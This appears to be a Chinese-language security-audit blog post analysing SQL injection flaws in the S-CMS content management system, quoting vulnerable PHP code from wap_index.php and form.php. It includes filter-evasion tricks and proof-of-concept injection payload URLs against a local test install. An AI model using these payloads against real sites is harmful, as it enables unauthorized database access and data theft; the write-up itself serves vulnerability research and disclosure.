0x01 前言
有段時間沒有發文章了,主要沒挖到比較有意思的漏洞點。然后看最近爆了很多關于S-CMS的漏洞,下載了源碼簡單挖了一下然后給大家分享一下。
0x02 目錄
Wap_index.php sql注入Form.php Sql注入Input、query
0x03 插曲
這里分享一下在審計的時候自用的一段代碼。
$debug=function(){
$logFile='C:\\Users\\DELL\\Desktop\\debug.txt'; //輸出的文件
$param=func_get_args(); //獲取傳入函數的參數
if (count($param)>0){
$str=serialize($param); //序列號
if($str){ //存在就寫入
$str=file_get_contents($logFile)."\r\n\r\n".__FILE__.":\t\t".$str;
file_put_contents($logFile,"\t\t".$str);
}else{ //不存在寫入Null
$str=file_get_contents($logFile)."\r\n\r\n".__FILE__.":\r\n".$str;
file_put_contents($logFile,"\t\tNull");
}
}
};$debug($x,$a,$b); //這里$x,$a,$b都是要查看的變量。
主要用這個的話個人感覺比較方便,平常測試都是var_dump();die;來查看。然后當die后,頁面還是沒有打印內容,用這個函數還是相對比較方便的。當然用phpstorm下斷點挺好的,不過個人不太喜歡。主要還是我懶。
0x04 Wap_index.php sql注入
漏洞文件:\scms\wap_index.php這個文件的話不止這一處Sql注入,這里只寫這一個。漏洞行號:90-96
case "text":
$debug("select * from SL_text where T_id=" . $S_id, "T_title");
if (getrs("select * from SL_text where T_id=" . $S_id, "T_title") == "") {
box("菜單指向的簡介已被刪除,請到“菜單管理”重新編輯", "back", "error");
} else {
$page_info = ReplaceLableFlag(ReplaceWapTag(CreateHTMLReplace(CreateText(ReplaceWapPart(LoadWapTemplate($style, $S_id)) , $S_id))));
}
break;
S_id直接從GET獲取無單引號拼接進了sql語句
if(isset($_GET["S_id"])){
$S_id = $_GET["S_id"];
}else{
$S_id = "0";
}
這套CMS核心全帶全都加密處理了所以我們看不到他的過濾方法,不過當出現 union select 等的時候都直接退出了,沒有繼續往下執行。研究發現當傳入select(user())能正常執行,不過嘗試union(select(1)) 的時候也沒有執行,應該是直接正則匹配的union這個單詞,而select匹配了前后的空格。
漏洞演示:
$debug保存下來的信息。
D:\phpStudy\PHPTutorial\WWW\scms\wap_index.php: a:2:{i:0;s:58:"select * from SL_text where T_id=1 and (select(user())!=1)";i:1;s:7:"T_title";}
Mysql.log
正常執行了sql語句。S_id=1 and (select(user()) from sl_reply 同樣可以正常執行,可通過盲注爆數據。
0x05 Form.php Sql注入
漏洞文件:\scms\form.php
漏洞Action:input
if($action=="input"){
if ($_POST["code"]!=$_SESSION["CmsCode"]){
echo "<div style='height:500px'></div>";
box(lang("驗證碼錯誤!/l/Verification code error"),"back","error");
}else{
$R_time=date('Y-m-d H:i:s');
$R_rid=gen_key(15);
foreach ($_POST as $x=>$value) {
if ($x>0){
if ($_POST[$x]==""){
box(lang("請填全內容后提交!/l/Please fill in the full content to submit!"),"back","error");
die();
}else{
if (!IsValidStr($_POST[$x])){
box(lang("您輸入的內容有敏感字符,請重新輸入!/l/The contents you have entered are sensitive characters, please re-enter!"),"back","error");
}else{
$debug("Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(".$x.",'".htmlspecialchars($_POST[$x])."','".$R_time."','".$R_rid."',".$M_id.")");
mysqli_query($conn,"Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(".$x.",'".htmlspecialchars($_POST[$x])."','".$R_time."','".$R_rid."',".$M_id.")");
}
}
}
}
if ($F_cq>0){
mysqli_query($conn,"Insert into SL_query(Q_code,Q_content,Q_sort) values('".$R_rid."','".date('Y-m-d H:i:s')."__用戶提交表單,等待處理"."',".$F_cq.")");
box(lang("提交成功,查詢碼 ".$R_rid."/l/success!code ".$R_rid.""),$C_dir.$url_to,"success");
}else{
box(lang("提交成功!/l/success!code ".$R_rid.""),$C_dir.$url_to,"success");
}
sendmail("您的網站有新的表單提交","<h2>您的網站“".lang($C_webtitle)."”有新的表單提交</h2><hr>請進入“網站后臺” - “表單系統” - “查看統計”查看詳情!",$C_email);
}
}
這里簡單看些邏輯,先判斷code驗證碼是否錯誤,如果為False不錯誤,進入foreach循環,判斷$x(也就是 $_POST的key)>0這里就可以通過php弱類型比如1a>0 為True 這個不多介紹了,然后如果$_POST[$x] 不為空,繼續檢測$_POST[$x] 是否存在敏感字符,然后拼接sql語句。
整個流程就這樣了,漏洞觸發點就是$x,它檢測敏感字符只檢測了$_POST[$x]內容,而沒檢測$x,而且直接拼接入了sql語句導致SQL注入。
漏洞演示:
http://127.0.0.1/scms/form.php?action=input&S_id=0code=ywu7&1//and//(1//like//1)=121
$debug記錄
D:\phpStudy\PHPTutorial\WWW\scms\form.php: a:1:{i:0;s:147:"Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(1//and//(1//like//1),'121','2018-12-05 15:27:00','WjWEpX8YIK6cfeq',6)";}
漏洞文件:\scms\form.php
漏洞Action:query
if ($action=="query"){
$Q_sort=$_POST["Q_sort"];
$Q_code=$_POST["Q_code"];
if ($_POST["code"]!=$_SESSION["CmsCode"]){
echo "<div style='height:500px'></div>";
box(lang("驗證碼錯誤!/l/Verification code error"),"back","error");
}else{
$sql="select * from SL_query where Q_sort=".$Q_sort." and Q_code like '".$Q_code."'";
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_assoc($result);
這個相對簡單不多說,$Q_sort從post獲取,無過濾直接拼接進sql語句導致sql注入。
Payload:http://127.0.0.1/scms/form.php?action=query&S_id=0code=t5o9&Q_sort=1 and 1=1
0x06 結束語
以上就是本文的全部內容,希望對大家的學習有所幫助,也希望大家多多支持腳本之家。
